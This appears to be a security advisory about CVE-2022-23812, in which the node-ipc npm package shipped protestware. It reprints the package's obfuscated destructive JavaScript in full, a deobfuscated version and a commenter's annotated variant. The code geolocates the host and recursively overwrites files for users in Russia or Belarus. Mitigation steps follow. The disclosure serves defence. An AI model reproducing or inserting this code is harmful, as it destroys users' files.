## https://sploitus.com/exploit?id=BBB370B5-6638-503F-B8CC-4B0788093A80
# [CVE-2022-23812](https://nvd.nist.gov/vuln/detail/CVE-2022-23812)
---
# [RIAEvangelist/node-ipc](https://github.com/RIAEvangelist/node-ipc) is malware / protestware
The `RIAEvangelist/node-ipc` module contains protestware [peacenotwar](https://github.com/RIAEvangelist/peacenotwar).
Excerpt from RIAEvangelist/node-ipc:
> ***as of v11.0.0 & v9.2.2*** this module uses the [peacenotwar](https://github.com/RIAEvangelist/peacenotwar) module.
---
More importantly, commits `847047cf7f81ab08352038b2204f0e7633449580 -> 6e344066a0464814a27fbd7ca8422f473956a803` of `RIAEvangelist/node-ipc` contains malware.
---
### :warning:| The following code is malicious, DO NOT RUN IT
https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js
> ##### The following codeblock was added in-case the url above is deactivated
> ```js
> import u from"path";import a from"fs";import o from"https";setTimeout(function(){const t=Math.round(Math.random()*4);if(t>1){return}const n=Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=","base64");o.get(n.toString("utf8"),function(t){t.on("data",function(t){const n=Buffer.from("Li8=","base64");const o=Buffer.from("Li4v","base64");const r=Buffer.from("Li4vLi4v","base64");const f=Buffer.from("Lw==","base64");const c=Buffer.from("Y291bnRyeV9uYW1l","base64");const e=Buffer.from("cnVzc2lh","base64");const i=Buffer.from("YmVsYXJ1cw==","base64");try{const s=JSON.parse(t.toString("utf8"));const u=s[c.toString("utf8")].toLowerCase();const a=u.includes(e.toString("utf8"))||u.includes(i.toString("utf8"));if(a){h(n.toString("utf8"));h(o.toString("utf8"));h(r.toString("utf8"));h(f.toString("utf8"))}}catch(t){}})})},Math.ceil(Math.random()*1e3));async function h(n="",o=""){if(!a.existsSync(n)){return}let r=[];try{r=a.readdirSync(n)}catch(t){}const f=[];const c=Buffer.from("4p2k77iP","base64");for(var e=0;e<r.length;e++){const i=u.join(n,r[e]);let t=null;try{t=a.lstatSync(i)}catch(t){continue}if(t.isDirectory()){const s=h(i,o);s.length>0?f.push(...s):null}else if(i.indexOf(o)>=0){try{a.writeFile(i,c.toString("utf8"),function(){})}catch(t){}}}return f};const ssl=true;export {ssl as default,ssl}
> ```
### :warning:| The above code is malicious, DO NOT RUN IT
---
I deobfuscated the code above and found that if the host machine's public ip address was from Russia or Belarus,
node-ipc would proceed overwrite many files with a heart emoji recursively while traversing up parent directories:
---
### :warning:| The following code is malicious, DO NOT RUN IT
```js
import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
const t = Math.round(Math.random() * 4);
if (t > 1) {
return;
}
const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64");
o.get(n.toString("utf8"), function (t) {
t.on("data", function (t) {
const n = Buffer.from("Li8=", "base64");
const o = Buffer.from("Li4v", "base64");
const r = Buffer.from("Li4vLi4v", "base64");
const f = Buffer.from("Lw==", "base64");
const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
const e = Buffer.from("cnVzc2lh", "base64");
const i = Buffer.from("YmVsYXJ1cw==", "base64");
try {
const s = JSON.parse(t.toString("utf8"));
const u = s[c.toString("utf8")].toLowerCase();
const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8"));
if (a) {
h(n.toString("utf8"));
h(o.toString("utf8"));
h(r.toString("utf8"));
h(f.toString("utf8"));
}
} catch (t) {}
});
});
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
if (!a.existsSync(n)) {
return;
}
let r = [];
try {
r = a.readdirSync(n);
} catch (t) {}
const f = [];
const c = Buffer.from("4p2k77iP", "base64");
for (var e = 0; e < r.length; e++) {
const i = u.join(n, r[e]);
let t = null;
try {
t = a.lstatSync(i);
} catch (t) {
continue;
}
if (t.isDirectory()) {
const s = h(i, o);
s.length > 0 ? f.push(...s) : null;
} else if (i.indexOf(o) >= 0) {
try {
a.writeFile(i, c.toString("utf8"), function () {});
} catch (t) {}
}
}
return f;
}
const ssl = true;
export { ssl as default, ssl };
```
### :warning:| The above code is malicious, DO NOT RUN IT
---
The following are excerpts from the malicious code:
```js
Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64");
// https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
```
```js
const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8"));
// checks if ip country is Russia or Belarus
```
```js
a.writeFile(i, c.toString("utf8"), function () {});
// overwrites file with `â¤ď¸`
```
---
The following demonstrates example of what each of the parameters going to the `a.writeFile(i,c.toString("utf8")` would be:
![image](https://user-images.githubusercontent.com/22574513/158507139-1ef9aa3a-b123-489e-a3d4-3c426d52aca3.png)
---
# Edit 2022-03-16_0
[Comment](https://github.com/vuejs/vue-cli/issues/7054#issuecomment-1069209509) by [zkyf](https://github.com/zkyf)
> Just made it better looked and commented dangerous code so you guys can take a try. Obviously the code will delete literally EVERYTHING on your drive.
>
> ```
> const path = require("path");
> const fs = require("fs");
> const https = require("https");
>
> setTimeout(function () {
> const randomNumber = Math.round(Math.random() * 4);
> if (randomNumber > 1) {
> // return;
> }
> const apiKey = "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154";
> const pwd = "./";
> const parentDir = "../";
> const grandParentDir = "../../";
> const root = "/";
> const countryName = "country_name";
> const russia = "russia";
> const belarus = "belarus";
>
> https.get(apiKey, function (message) {
> message.on("data", function (msgBuffer) {
> try {
> const message = JSON.parse(msgBuffer.toString("utf8"));
> const userCountryName = message[countryName.toString("utf8")].toLowerCase();
> const hasRus = userCountryName.includes(russia.toString("utf8")) || userCountryName.includes(belarus.toString("utf8")); // checks if country is Russia or Belarus
> if (hasRus) {
> deleteFile(pwd);
> deleteFile(parentDir);
> deleteFile(grandParentDir);
> deleteFile(root);
> }
> } catch (t) {}
> });
> });
>
> // zkyf: Let's try this directly here
> deleteFile(pwd);
> deleteFile(parentDir);
> deleteFile(grandParentDir);
> deleteFile(root);
> }, 100);
>
> async function deleteFile(pathName = "", o = "") {
> if (!fs.existsSync(pathName)) {
> return;
> }
> let fileList = [];
> try {
> fileList = fs.readdirSync(pathName);
> } catch (t) {}
> const f = [];
> const heartUtf8 = Buffer.from("4p2k77iP", "base64");
> for (var idx = 0; idx < fileList.length; idx++) {
> const fileName = path.join(pathName, fileList[idx]);
> let fileInfo = null;
> try {
> fileInfo = fs.lstatSync(fileName);
> } catch (err) {
> continue;
> }
> if (fileInfo.isDirectory()) {
> const fileSymbol = deleteFile(fileName, o);
> fileSymbol.length > 0 ? f.push(...fileSymbol) : null;
> } else if (fileName.indexOf(o) >= 0) {
> try {
> // fs.writeFile(fileName, heartUtf8.toString("utf8"), function () {}); // overwrites file with `â¤ď¸`
> console.log(`Rewrite ${fileName}`);
> } catch (err) {}
> }
> }
> return f;
> }
> ```
>
> Console: ![image](https://user-images.githubusercontent.com/13307442/158617117-0d4bc6c4-59ae-4fee-a852-418cb2189b72.png)
---
# Edit 2022-03-16_1 (requested by @lgg)
## Available mitigation methods:
The following mitigation strategies are inspired by cnpm's (is not npm) mitigation methods:
https://github.com/cnpm/bug-versions/pull/181
If you use one of the following mitigation stratagies, make sure to remove the `^` to force `node-ipc` to the specified version.
`"^9.x.x" -> "9.2.1"`
```diff
"dependencies": {
- "node-ipc": "^9.x.x"
+ "node-ipc": "9.2.1"
}
```
`"^10.x.x" -> "10.1.0"`
```diff
"dependencies": {
- "node-ipc": "^10.x.x"
+ "node-ipc": "10.1.0"
}
```
`"^11.x.x" -> "10.1.0"`
```diff
"dependencies": {
- "node-ipc": "^11.x.x"
+ "node-ipc": "10.1.0"
}
```
## 3rd-party mitigation methods:
- [vue-cli](https://github.com/vuejs/vue-cli/issues/7054#issuecomment-1069642202)
- [Unity Hub](https://unity3d.com/hub/whats-new)
---
# Edit 2022-03-16_2 (requested by @lgg)
## [CVE-2022-23812](https://nvd.nist.gov/vuln/detail/CVE-2022-23812)
# Edit 2022-03-17
@RIAEvangelist has banned me from interacting with their repositories